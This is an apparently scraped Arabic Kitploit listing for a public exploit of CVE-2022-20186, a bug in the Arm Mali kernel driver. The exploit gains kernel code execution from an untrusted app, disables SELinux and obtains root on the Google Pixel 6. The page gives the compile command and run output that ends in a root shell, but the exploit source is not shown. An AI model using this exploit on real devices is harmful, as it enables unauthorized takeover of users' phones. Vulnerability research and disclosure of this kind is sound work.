Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-20186_CTXZ — استغلال لـ CVE-2022-20186 في برنامج تشغيل نواة Arm Mali، يحقق تنفيذ تعليمات برمجية تعسفية للنواة من مجال تطبيق غير موثوق لتعطيل SELinux والحصول على صلاحيات الجذر على Google Pixel 6. | Kitploit
أدوات/GitHubGitHub/bariskizilkaya/cve-2022-20186_ctxz
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن الجوالاستغلال الملفات الثنائية
GitHubbariskizilkaya/cve-2022-20186_ctxz

CVE-2022-20186_CTXZ

استغلال لـ CVE-2022-20186 في برنامج تشغيل نواة Arm Mali، يحقق تنفيذ تعليمات برمجية تعسفية للنواة من مجال تطبيق غير موثوق لتعطيل SELinux والحصول على صلاحيات الجذر على Google Pixel 6.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3210منذ 3 سنواتلم تتم المراجعة بعد

استغلال CVE-2022-20186

يمكن العثور على الشرح هنا. هذا خطأ في برنامج تشغيل نواة Arm Mali أبلغت عنه في يناير 2022. يمكن استخدام الخطأ لتحقيق تنفيذ كود عشوائي في النواة من مجال التطبيق غير الموثوق، والذي يُستخدم بعد ذلك لتعطيل SELinux والحصول على صلاحية الجذر.

تم اختبار الاستغلال على Google Pixel 6 ويدعم مستويات التصحيح من Novmember 2021 إلى Feburary 2022. من السهل إضافة دعم للبرامج الثابتة الأخرى عن طريق تغيير بعض إزاحات الصور. كمرجع، استخدمت الأمر التالي للتجميع باستخدام clang في ndk-21:

android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang mali_alias.c -o mali_alias

نادرًا ما يفشل الاستغلال ويمكن إعادة المحاولة دون تعطل الجهاز. إذا نجح، يجب أن يعطل SELinux ويحصل على صلاحية الجذر.

oriole:/ $ /data/local/tmp/mali_alias                                                                                             
fingerprint: google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys
tracking page 0x6ff794e000
drain 0x6d5b200000
gpu_va[0] 6ff6698000
gpu_va[1] 6ff6695000
alias 0x6ff6693000
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
oriole:/ # 
تنزيل الأداة